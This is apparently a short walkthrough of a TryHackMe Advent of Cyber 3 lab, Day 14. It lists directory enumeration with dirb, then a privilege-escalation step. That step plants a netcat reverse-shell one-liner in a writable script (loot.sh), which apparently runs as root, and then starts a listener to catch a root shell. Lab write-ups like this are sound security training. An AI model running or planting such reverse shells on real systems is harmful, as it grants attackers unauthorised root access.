Day-14:Dev(Insecure)Ops

front

https://tryhackme.com/room/adventofcyber3

Gaining Access

  1. Using dirb command to find
    ➟ 4 Directories
  2. Number of scripts
    scripts
  3. Inside loot.sh add netcat reverse shell one liner rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f then start a listner at attacker’s machine nc -lvnp 1234 wait for a minute and you will have the root access
    • cat /etc/passwd
      pepper
  4. Flag:
    flag